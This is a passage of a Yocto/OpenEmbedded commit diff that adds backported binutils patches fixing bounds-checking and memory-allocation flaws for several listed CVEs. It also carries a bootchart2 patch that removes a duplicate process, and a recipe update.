+-      if ((b->flags & (BSF_SECTION_SYM | BSF_SYNTHETIC)) == 0)
+-	bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
+-      if (asz != bsz)
+-	return asz > bsz ? -1 : 1;
+-    }
++    bsz = ((elf_symbol_type *) b)->internal_elf_sym.st_size;
++  if (asz != bsz)
++    return asz > bsz ? -1 : 1;
+ 
+   /* Symbols that start with '.' might be section names, so sort them
+      after symbols that don't start with '.'.  */
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
new file mode 100644
index 0000000000..f41c02a02b
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-48063.patch
@@ -0,0 +1,49 @@
+From 75393a2d54bcc40053e5262a3de9d70c5ebfbbfd Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Wed, 21 Dec 2022 11:51:23 +0000
+Subject: [PATCH] Fix an attempt to allocate an unreasonably large amount of
+ memory when parsing a corrupt ELF file.
+
+	PR  29924
+	* objdump.c (load_specific_debug_section): Check for excessively
+	large sections.
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=75393a2d54bcc40053e5262a3de9d70c5ebfbbfd]
+CVE: CVE-2022-48063
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/ChangeLog | 6 ++++++
+ binutils/objdump.c | 4 +++-
+ 2 files changed, 9 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index e7f918d3f65..020e09f3700 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,9 @@
++2022-12-21  Nick Clifton  <nickc@redhat.com>
++
++	PR  29924
++	* objdump.c (load_specific_debug_section): Check for excessively
++	large sections.
++
+ 2021-02-11  Alan Modra  <amodra@gmail.com>
+ 
+ 	   PR 27290
+
+diff --git a/binutils/objdump.c b/binutils/objdump.c
+index d51abbe3858..2eb02de0e76 100644
+--- a/binutils/objdump.c
++++ b/binutils/objdump.c
+@@ -3479,7 +3479,9 @@
+   section->size = bfd_section_size (sec);
+   /* PR 24360: On 32-bit hosts sizeof (size_t) < sizeof (bfd_size_type). */
+   alloced = amt = section->size + 1;
+-  if (alloced != amt || alloced == 0)
++  if (alloced != amt
++      || alloced == 0
++      || (bfd_get_size (abfd) != 0 && alloced >= bfd_get_size (abfd)))
+     {
+       section->start = NULL;
+       free_debug_section (debug);
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
new file mode 100644
index 0000000000..732ea43210
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25584.patch
@@ -0,0 +1,530 @@
+CVE: CVE-2023-25584
+Upstream-Status: Backport [ import from ubuntu http://archive.ubuntu.com/ubuntu/pool/main/b/binutils/binutils_2.34-6ubuntu1.7.debian.tar.xz  upstream  https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=77c225bdeb410cf60da804879ad41622f5f1aa44 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+[Ubuntu note: this is backport of the original patch, no major changes just
+ fix this patch for this release]
+From 77c225bdeb410cf60da804879ad41622f5f1aa44 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Mon, 12 Dec 2022 18:28:49 +1030
+Subject: [PATCH] Lack of bounds checking in vms-alpha.c parse_module
+
+	PR 29873
+	PR 29874
+	PR 29875
+	PR 29876
+	PR 29877
+	PR 29878
+	PR 29879
+	PR 29880
+	PR 29881
+	PR 29882
+	PR 29883
+	PR 29884
+	PR 29885
+	PR 29886
+	PR 29887
+	PR 29888
+	PR 29889
+	PR 29890
+	PR 29891
+	* vms-alpha.c (parse_module): Make length param bfd_size_type.
+	Delete length == -1 checks.  Sanity check record_length.
+	Sanity check DST__K_MODBEG, DST__K_RTNBEG, DST__K_RTNEND lengths.
+	Sanity check DST__K_SOURCE and DST__K_LINE_NUM elements
+	before accessing.
+	(build_module_list): Pass dst_section size to parse_module.
+---
+ bfd/vms-alpha.c | 213 ++++++++++++++++++++++++++++++++++++++----------
+ 1 file changed, 168 insertions(+), 45 deletions(-)
+
+--- binutils-2.34.orig/bfd/vms-alpha.c
++++ binutils-2.34/bfd/vms-alpha.c
+@@ -4267,7 +4267,7 @@ new_module (bfd *abfd)
+ 
+ static void
+ parse_module (bfd *abfd, struct module *module, unsigned char *ptr,
+-	      int length)
++	      bfd_size_type length)
+ {
+   unsigned char *maxptr = ptr + length;
+   unsigned char *src_ptr, *pcl_ptr;
+@@ -4284,7 +4284,7 @@ parse_module (bfd *abfd, struct module *
+   curr_line = (struct lineinfo *) bfd_zalloc (abfd, sizeof (struct lineinfo));
+   module->line_table = curr_line;
+ 
+-  while (length == -1 || ptr < maxptr)
++  while (ptr < maxptr)
+     {
+       /* The first byte is not counted in the recorded length.  */
+       int rec_length = bfd_getl16 (ptr) + 1;
+@@ -4292,15 +4292,19 @@ parse_module (bfd *abfd, struct module *
+ 
+       vms_debug2 ((2, "DST record: leng %d, type %d\n", rec_length, rec_type));
+ 
+-      if (length == -1 && rec_type == DST__K_MODEND)
++      if (rec_length > maxptr - ptr)
++	break;
++      if (rec_type == DST__K_MODEND)
+ 	break;
+ 
+       switch (rec_type)
+ 	{
+ 	case DST__K_MODBEG:
++	  if (rec_length <= DST_S_B_MODBEG_NAME)
++	    break;
+ 	  module->name
+ 	    = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_MODBEG_NAME,
+-					    maxptr - (ptr + DST_S_B_MODBEG_NAME));
++					    rec_length - DST_S_B_MODBEG_NAME);
+ 
+ 	  curr_pc = 0;
+ 	  prev_pc = 0;
+@@ -4314,11 +4318,13 @@ parse_module (bfd *abfd, struct module *
+ 	  break;
+ 
+ 	case DST__K_RTNBEG:
++	  if (rec_length <= DST_S_B_RTNBEG_NAME)
++	    break;
+ 	  funcinfo = (struct funcinfo *)
+ 	    bfd_zalloc (abfd, sizeof (struct funcinfo));
+ 	  funcinfo->name
+ 	    = _bfd_vms_save_counted_string (abfd, ptr + DST_S_B_RTNBEG_NAME,
+-					    maxptr - (ptr + DST_S_B_RTNBEG_NAME));
++					    rec_length - DST_S_B_RTNBEG_NAME);
+ 	  funcinfo->low = bfd_getl32 (ptr + DST_S_L_RTNBEG_ADDRESS);
+ 	  funcinfo->next = module->func_table;
+ 	  module->func_table = funcinfo;
+@@ -4328,6 +4334,8 @@ parse_module (bfd *abfd, struct module *
+ 	  break;
+ 
+ 	case DST__K_RTNEND:
++	  if (rec_length < DST_S_L_RTNEND_SIZE + 4)
++	    break;
+ 	  module->func_table->high = module->func_table->low
+ 	    + bfd_getl32 (ptr + DST_S_L_RTNEND_SIZE) - 1;
+ 
+@@ -4358,13 +4366,66 @@ parse_module (bfd *abfd, struct module *
+ 
+ 	  vms_debug2 ((3, "source info\n"));
+ 
+-	  while (src_ptr < ptr + rec_length)
++	  while (src_ptr - ptr < rec_length)
+ 	    {
+ 	      int cmd = src_ptr[0], cmd_length, data;
+ 
+ 	      switch (cmd)
+ 		{
+ 		case DST__K_SRC_DECLFILE:
++		  if (src_ptr - ptr + DST_S_B_SRC_DF_LENGTH >= rec_length)
++		    cmd_length = 0x10000;
++		  else
++		    cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
++		  break;
++
++		case DST__K_SRC_DEFLINES_B:
++		  cmd_length = 2;
++		  break;
++
++		case DST__K_SRC_DEFLINES_W:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_SRC_INCRLNUM_B:
++		  cmd_length = 2;
++		  break;
++
++		case DST__K_SRC_SETFILE:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_SRC_SETLNUM_L:
++		  cmd_length = 5;
++		  break;
++
++		case DST__K_SRC_SETLNUM_W:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_SRC_SETREC_L:
++		  cmd_length = 5;
++		  break;
++
++		case DST__K_SRC_SETREC_W:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_SRC_FORMFEED:
++		  cmd_length = 1;
++		  break;
++
++		default:
++		  cmd_length = 2;
++		  break;
++		}
++
++	      if (src_ptr - ptr + cmd_length > rec_length)
++		break;
++
++	      switch (cmd)
++		{
++		case DST__K_SRC_DECLFILE:
+ 		  {
+ 		    unsigned int fileid
+ 		      = bfd_getl16 (src_ptr + DST_S_W_SRC_DF_FILEID);
+@@ -4384,7 +4445,6 @@ parse_module (bfd *abfd, struct module *
+ 
+ 		    module->file_table [fileid].name = filename;
+ 		    module->file_table [fileid].srec = 1;
+-		    cmd_length = src_ptr[DST_S_B_SRC_DF_LENGTH] + 2;
+ 		    vms_debug2 ((4, "DST_S_C_SRC_DECLFILE: %d, %s\n",
+ 				 fileid, module->file_table [fileid].name));
+ 		  }
+@@ -4401,7 +4461,6 @@ parse_module (bfd *abfd, struct module *
+ 		  srec->sfile = curr_srec->sfile;
+ 		  curr_srec->next = srec;
+ 		  curr_srec = srec;
+-		  cmd_length = 2;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_B: %d\n", data));
+ 		  break;
+ 
+@@ -4416,14 +4475,12 @@ parse_module (bfd *abfd, struct module *
+ 		  srec->sfile = curr_srec->sfile;
+ 		  curr_srec->next = srec;
+ 		  curr_srec = srec;
+-		  cmd_length = 3;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_DEFLINES_W: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SRC_INCRLNUM_B:
+ 		  data = src_ptr[DST_S_B_SRC_UNSBYTE];
+ 		  curr_srec->line += data;
+-		  cmd_length = 2;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_INCRLNUM_B: %d\n", data));
+ 		  break;
+ 
+@@ -4431,21 +4488,18 @@ parse_module (bfd *abfd, struct module *
+ 		  data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ 		  curr_srec->sfile = data;
+ 		  curr_srec->srec = module->file_table[data].srec;
+-		  cmd_length = 3;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_SETFILE: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SRC_SETLNUM_L:
+ 		  data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
+ 		  curr_srec->line = data;
+-		  cmd_length = 5;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_L: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SRC_SETLNUM_W:
+ 		  data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ 		  curr_srec->line = data;
+-		  cmd_length = 3;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_SETLNUM_W: %d\n", data));
+ 		  break;
+ 
+@@ -4453,7 +4507,6 @@ parse_module (bfd *abfd, struct module *
+ 		  data = bfd_getl32 (src_ptr + DST_S_L_SRC_UNSLONG);
+ 		  curr_srec->srec = data;
+ 		  module->file_table[curr_srec->sfile].srec = data;
+-		  cmd_length = 5;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_SETREC_L: %d\n", data));
+ 		  break;
+ 
+@@ -4461,19 +4514,16 @@ parse_module (bfd *abfd, struct module *
+ 		  data = bfd_getl16 (src_ptr + DST_S_W_SRC_UNSWORD);
+ 		  curr_srec->srec = data;
+ 		  module->file_table[curr_srec->sfile].srec = data;
+-		  cmd_length = 3;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_SETREC_W: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SRC_FORMFEED:
+-		  cmd_length = 1;
+ 		  vms_debug2 ((4, "DST_S_C_SRC_FORMFEED\n"));
+ 		  break;
+ 
+ 		default:
+ 		  _bfd_error_handler (_("unknown source command %d"),
+ 				      cmd);
+-		  cmd_length = 2;
+ 		  break;
+ 		}
+ 
+@@ -4486,7 +4536,7 @@ parse_module (bfd *abfd, struct module *
+ 
+ 	  vms_debug2 ((3, "line info\n"));
+ 
+-	  while (pcl_ptr < ptr + rec_length)
++	  while (pcl_ptr - ptr < rec_length)
+ 	    {
+ 	      /* The command byte is signed so we must sign-extend it.  */
+ 	      int cmd = ((signed char *)pcl_ptr)[0], cmd_length, data;
+@@ -4494,10 +4544,106 @@ parse_module (bfd *abfd, struct module *
+ 	      switch (cmd)
+ 		{
+ 		case DST__K_DELTA_PC_W:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_DELTA_PC_L:
++		  cmd_length = 5;
++		  break;
++
++		case DST__K_INCR_LINUM:
++		  cmd_length = 2;
++		  break;
++
++		case DST__K_INCR_LINUM_W:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_INCR_LINUM_L:
++		  cmd_length = 5;
++		  break;
++
++		case DST__K_SET_LINUM_INCR:
++		  cmd_length = 2;
++		  break;
++
++		case DST__K_SET_LINUM_INCR_W:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_RESET_LINUM_INCR:
++		  cmd_length = 1;
++		  break;
++
++		case DST__K_BEG_STMT_MODE:
++		  cmd_length = 1;
++		  break;
++
++		case DST__K_END_STMT_MODE:
++		  cmd_length = 1;
++		  break;
++
++		case DST__K_SET_LINUM_B:
++		  cmd_length = 2;
++		  break;
++
++		case DST__K_SET_LINUM:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_SET_LINUM_L:
++		  cmd_length = 5;
++		  break;
++
++		case DST__K_SET_PC:
++		  cmd_length = 2;
++		  break;
++
++		case DST__K_SET_PC_W:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_SET_PC_L:
++		  cmd_length = 5;
++		  break;
++
++		case DST__K_SET_STMTNUM:
++		  cmd_length = 2;
++		  break;
++
++		case DST__K_TERM:
++		  cmd_length = 2;
++		  break;
++
++		case DST__K_TERM_W:
++		  cmd_length = 3;
++		  break;
++
++		case DST__K_TERM_L:
++		  cmd_length = 5;
++		  break;
++
++		case DST__K_SET_ABS_PC:
++		  cmd_length = 5;
++		  break;
++
++		default:
++		  if (cmd <= 0)
++		    cmd_length = 1;
++		  else
++		    cmd_length = 2;
++		  break;
++		}
++
++	      if (pcl_ptr - ptr + cmd_length > rec_length)
++		break;
++
++	      switch (cmd)
++		{
++		case DST__K_DELTA_PC_W:
+ 		  data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ 		  curr_pc += data;
+ 		  curr_linenum += 1;
+-		  cmd_length = 3;
+ 		  vms_debug2 ((4, "DST__K_DELTA_PC_W: %d\n", data));
+ 		  break;
+ 
+@@ -4505,131 +4651,111 @@ parse_module (bfd *abfd, struct module *
+ 		  data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ 		  curr_pc += data;
+ 		  curr_linenum += 1;
+-		  cmd_length = 5;
+ 		  vms_debug2 ((4, "DST__K_DELTA_PC_L: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_INCR_LINUM:
+ 		  data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ 		  curr_linenum += data;
+-		  cmd_length = 2;
+ 		  vms_debug2 ((4, "DST__K_INCR_LINUM: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_INCR_LINUM_W:
+ 		  data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ 		  curr_linenum += data;
+-		  cmd_length = 3;
+ 		  vms_debug2 ((4, "DST__K_INCR_LINUM_W: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_INCR_LINUM_L:
+ 		  data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ 		  curr_linenum += data;
+-		  cmd_length = 5;
+ 		  vms_debug2 ((4, "DST__K_INCR_LINUM_L: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SET_LINUM_INCR:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_SET_LINUM_INCR");
+-		  cmd_length = 2;
+ 		  break;
+ 
+ 		case DST__K_SET_LINUM_INCR_W:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_SET_LINUM_INCR_W");
+-		  cmd_length = 3;
+ 		  break;
+ 
+ 		case DST__K_RESET_LINUM_INCR:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_RESET_LINUM_INCR");
+-		  cmd_length = 1;
+ 		  break;
+ 
+ 		case DST__K_BEG_STMT_MODE:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_BEG_STMT_MODE");
+-		  cmd_length = 1;
+ 		  break;
+ 
+ 		case DST__K_END_STMT_MODE:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_END_STMT_MODE");
+-		  cmd_length = 1;
+ 		  break;
+ 
+ 		case DST__K_SET_LINUM_B:
+ 		  data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ 		  curr_linenum = data;
+-		  cmd_length = 2;
+ 		  vms_debug2 ((4, "DST__K_SET_LINUM_B: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SET_LINUM:
+ 		  data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ 		  curr_linenum = data;
+-		  cmd_length = 3;
+ 		  vms_debug2 ((4, "DST__K_SET_LINE_NUM: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SET_LINUM_L:
+ 		  data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ 		  curr_linenum = data;
+-		  cmd_length = 5;
+ 		  vms_debug2 ((4, "DST__K_SET_LINUM_L: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SET_PC:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_SET_PC");
+-		  cmd_length = 2;
+ 		  break;
+ 
+ 		case DST__K_SET_PC_W:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_SET_PC_W");
+-		  cmd_length = 3;
+ 		  break;
+ 
+ 		case DST__K_SET_PC_L:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_SET_PC_L");
+-		  cmd_length = 5;
+ 		  break;
+ 
+ 		case DST__K_SET_STMTNUM:
+ 		  _bfd_error_handler
+ 		    (_("%s not implemented"), "DST__K_SET_STMTNUM");
+-		  cmd_length = 2;
+ 		  break;
+ 
+ 		case DST__K_TERM:
+ 		  data = pcl_ptr[DST_S_B_PCLINE_UNSBYTE];
+ 		  curr_pc += data;
+-		  cmd_length = 2;
+ 		  vms_debug2 ((4, "DST__K_TERM: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_TERM_W:
+ 		  data = bfd_getl16 (pcl_ptr + DST_S_W_PCLINE_UNSWORD);
+ 		  curr_pc += data;
+-		  cmd_length = 3;
+ 		  vms_debug2 ((4, "DST__K_TERM_W: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_TERM_L:
+ 		  data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ 		  curr_pc += data;
+-		  cmd_length = 5;
+ 		  vms_debug2 ((4, "DST__K_TERM_L: %d\n", data));
+ 		  break;
+ 
+ 		case DST__K_SET_ABS_PC:
+ 		  data = bfd_getl32 (pcl_ptr + DST_S_L_PCLINE_UNSLONG);
+ 		  curr_pc = data;
+-		  cmd_length = 5;
+ 		  vms_debug2 ((4, "DST__K_SET_ABS_PC: 0x%x\n", data));
+ 		  break;
+ 
+@@ -4638,15 +4764,11 @@ parse_module (bfd *abfd, struct module *
+ 		    {
+ 		      curr_pc -= cmd;
+ 		      curr_linenum += 1;
+-		      cmd_length = 1;
+ 		      vms_debug2 ((4, "bump pc to 0x%lx and line to %d\n",
+ 				   (unsigned long)curr_pc, curr_linenum));
+ 		    }
+ 		  else
+-		    {
+-		      _bfd_error_handler (_("unknown line command %d"), cmd);
+-		      cmd_length = 2;
+-		    }
++		    _bfd_error_handler (_("unknown line command %d"), cmd);
+ 		  break;
+ 		}
+ 
+@@ -4778,7 +4900,7 @@ build_module_list (bfd *abfd)
+ 	return NULL;
+ 
+       module = new_module (abfd);
+-      parse_module (abfd, module, PRIV (dst_section)->contents, -1);
++      parse_module (abfd, module, PRIV (dst_section)->contents, PRIV (dst_section)->size);
+       list = module;
+     }
+ 
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
new file mode 100644
index 0000000000..aa5ce5f3ff
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2023-25588.patch
@@ -0,0 +1,149 @@
+From d12f8998d2d086f0a6606589e5aedb7147e6f2f1 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 14 Oct 2022 10:30:21 +1030
+Subject: [PATCH] PR29677, Field `the_bfd` of `asymbol` is uninitialised
+
+Besides not initialising the_bfd of synthetic symbols, counting
+symbols when sizing didn't match symbols created if there were any
+dynsyms named "".  We don't want synthetic symbols without names
+anyway, so get rid of them.  Also, simplify and correct sanity checks.
+
+	PR 29677
+	* mach-o.c (bfd_mach_o_get_synthetic_symtab): Rewrite.
+---
+Upstream-Status: Backport from [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=d12f8998d2d086f0a6606589e5aedb7147e6f2f1]
+CVE: CVE-2023-25588
+CVE: CVE-2022-47696
+
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+
+ bfd/mach-o.c | 72 ++++++++++++++++++++++------------------------------
+ 1 file changed, 31 insertions(+), 41 deletions(-)
+
+diff --git a/bfd/mach-o.c b/bfd/mach-o.c
+index acb35e7f0c6..5279343768c 100644
+--- a/bfd/mach-o.c
++++ b/bfd/mach-o.c
+@@ -938,11 +938,9 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+   bfd_mach_o_symtab_command *symtab = mdata->symtab;
+   asymbol *s;
+   char * s_start;
+-  char * s_end;
+   unsigned long count, i, j, n;
+   size_t size;
+   char *names;
+-  char *nul_name;
+   const char stub [] = "$stub";
+ 
+   *ret = NULL;
+@@ -955,27 +953,27 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+   /* We need to allocate a bfd symbol for every indirect symbol and to
+      allocate the memory for its name.  */
+   count = dysymtab->nindirectsyms;
+-  size = count * sizeof (asymbol) + 1;
+-
++  size = 0;
+   for (j = 0; j < count; j++)
+     {
+-      const char * strng;
+       unsigned int isym = dysymtab->indirect_syms[j];
++      const char *str;
+ 
+       /* Some indirect symbols are anonymous.  */
+-      if (isym < symtab->nsyms && (strng = symtab->symbols[isym].symbol.name))
+-	/* PR 17512: file: f5b8eeba.  */
+-	size += strnlen (strng, symtab->strsize - (strng - symtab->strtab)) + sizeof (stub);
++      if (isym < symtab->nsyms
++	  && (str = symtab->symbols[isym].symbol.name) != NULL)
++	{
++	  /* PR 17512: file: f5b8eeba.  */
++	  size += strnlen (str, symtab->strsize - (str - symtab->strtab));
++	  size += sizeof (stub);
++	}
+     }
+ 
+-  s_start = bfd_malloc (size);
++  s_start = bfd_malloc (size + count * sizeof (asymbol));
+   s = *ret = (asymbol *) s_start;
+   if (s == NULL)
+     return -1;
+   names = (char *) (s + count);
+-  nul_name = names;
+-  *names++ = 0;
+-  s_end = s_start + size;
+ 
+   n = 0;
+   for (i = 0; i < mdata->nsects; i++)
+@@ -997,47 +995,39 @@ bfd_mach_o_get_synthetic_symtab (bfd *abfd,
+ 	  entry_size = bfd_mach_o_section_get_entry_size (abfd, sec);
+ 
+ 	  /* PR 17512: file: 08e15eec.  */
+-	  if (first >= count || last >= count || first > last)
++	  if (first >= count || last > count || first > last)
+ 	    goto fail;
+ 
+ 	  for (j = first; j < last; j++)
+ 	    {
+ 	      unsigned int isym = dysymtab->indirect_syms[j];
+-
+-	      /* PR 17512: file: 04d64d9b.  */
+-	      if (((char *) s) + sizeof (* s) > s_end)
+-		goto fail;
+-
+-	      s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
+-	      s->section = sec->bfdsection;
+-	      s->value = addr - sec->addr;
+-	      s->udata.p = NULL;
++	      const char *str;
++	      size_t len;
+ 
+ 	      if (isym < symtab->nsyms
+-		  && symtab->symbols[isym].symbol.name)
++		  && (str = symtab->symbols[isym].symbol.name) != NULL)
+ 		{
+-		  const char *sym = symtab->symbols[isym].symbol.name;
+-		  size_t len;
+-
+-		  s->name = names;
+-		  len = strlen (sym);
+-		  /* PR 17512: file: 47dfd4d2.  */
+-		  if (names + len >= s_end)
++		  /* PR 17512: file: 04d64d9b.  */
++		  if (n >= count)
+ 		    goto fail;
+-		  memcpy (names, sym, len);
+-		  names += len;
+-		  /* PR 17512: file: 18f340a4.  */
+-		  if (names + sizeof (stub) >= s_end)
++		  len = strnlen (str, symtab->strsize - (str - symtab->strtab));
++		  /* PR 17512: file: 47dfd4d2, 18f340a4.  */
++		  if (size < len + sizeof (stub))
+ 		    goto fail;
+-		  memcpy (names, stub, sizeof (stub));
+-		  names += sizeof (stub);
++		  memcpy (names, str, len);
++		  memcpy (names + len, stub, sizeof (stub));
++		  s->name = names;
++		  names += len + sizeof (stub);
++		  size -= len + sizeof (stub);
++		  s->the_bfd = symtab->symbols[isym].symbol.the_bfd;
++		  s->flags = BSF_GLOBAL | BSF_SYNTHETIC;
++		  s->section = sec->bfdsection;
++		  s->value = addr - sec->addr;
++		  s->udata.p = NULL;
++		  s++;
++		  n++;
+ 		}
+-	      else
+-		s->name = nul_name;
+-
+ 	      addr += entry_size;
+-	      s++;
+-	      n++;
+ 	    }
+ 	  break;
+ 	default:
+-- 
+2.39.3
+
diff --git a/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
new file mode 100644
index 0000000000..3cb8a3c2a2
--- /dev/null
+++ b/meta/recipes-devtools/bootchart2/bootchart2/0001-bootchartd.in-make-sure-only-one-bootchartd-process.patch
@@ -0,0 +1,68 @@
+From 988ca784d4840c87509e770a21d5d22105af8668 Mon Sep 17 00:00:00 2001
+From: Mingli Yu <mingli.yu@windriver.com>
+Date: Fri, 5 Nov 2021 11:18:07 +0800
+Subject: [PATCH] bootchartd.in: make sure only one bootchartd process
+
+When boot with "init=/sbin/bootchartd" as below:
+ # runqemu qemux86 bootparams="init=/sbin/bootchartd"
+
+There are two bootchartd process after boot [1].
+ # ps -ef | grep bootchart
+root       101     1  0 03:27 ?        00:00:00 /bin/sh /sbin/bootchartd
+root       103   101  8 03:27 ?        00:00:02 /lib64/bootchart/bootchart-collector 50
+root       106     1  0 03:27 ?        00:00:00 /bin/sh /sbin/bootchartd
+root       792   106  0 03:27 ?        00:00:00 /lib64/bootchart/bootchart-collector --usleep 1000000
+root       794   725  0 03:27 ttyS0    00:00:00 grep bootchart
+
+ # /sbin/bootchartd stop
+[bootchart] bootchart-collector started as pid 596 with 2 args:
+[bootchart] '--dump'
+[bootchart] '/tmp/bootchart.3lXpVDAq3v'
+[bootchart] Extracting profile data from pid 204
+[bootchart] map 0xbed9a000 -> 0xbedbb000 size: 132k from 'bed9a000' 'bedbb000'
+[bootchart] read 135168 bytes of 135168
+[bootchart] reading 150 chunks (of 150) ...
+[bootchart] wrote 18760 kbB
+[bootchart] bootchart-collector pid: 596 unmounted proc / clean exit
+
+But there still one process exist after the above stop command finish.
+ # ps -ef | grep bootchartd
+root 202 1 0 09:09 ? 00:00:00 /bin/sh /sbin/bootchartd
+root 629 516 0 09:10 ? 00:00:00 grep bootchartd
+
+Remove the wait_boot which used to wait the boot process to finish to
+make sure only one bootchartd process and meanwhile we don't need the
+wait_boot logic because we either use "/sbin/bootchartd stop" to stop
+the bootchartd manually or install package bootchartd-stop-initscript
+altogether with bootchart2 to stop bootchartd automatically after boot.
+
+After patch:
+ # ps -ef | grep bootchart
+ root       101     1  0 03:36 ?        00:00:00 /bin/sh /sbin/bootchartd
+ root       103   101  6 03:36 ?        00:00:04 /lib64/bootchart/bootchart-collector 50
+ root       596   592  0 03:37 ttyS0    00:00:00 grep bootchart
+
+[1] https://github.com/xrmx/bootchart/issues/94
+
+Upstream-Status: Submitted [https://github.com/xrmx/bootchart/pull/95]
+
+Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
+---
+ bootchartd.in | 1 -
+ 1 file changed, 1 deletion(-)
+
+diff --git a/bootchartd.in b/bootchartd.in
+index 7979ef9..f0e466d 100755
+--- a/bootchartd.in
++++ b/bootchartd.in
+@@ -183,7 +183,6 @@ if [ $$ -eq 1 ]; then
+ 	else # running inside the main system
+ 		echo "bootchart: no initrd used; starting"
+ 		start &
+-		wait_boot &
+ 		# wait a little, until the collector is going, before allowing
+ 		# the rest of the system to charge ahead, so we catch it
+ 		$USLEEP 250000
+-- 
+2.17.1
+
diff --git a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
index a938b2da49..7f05bd1b0b 100644
--- a/meta/recipes-devtools/bootchart2/bootchart2_0.14.8.bb
+++ b/meta/recipes-devtools/bootchart2/bootchart2_0.14.9.bb
@@ -90,15 +90,15 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=44ac4678311254db62edf8fd39cb8124"
 
 UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+(\.\d+)*)"
 
-SRC_URI = "git://github.com/xrmx/bootchart.git \
+SRC_URI = "git://github.com/xrmx/bootchart.git;branch=master;protocol=https \
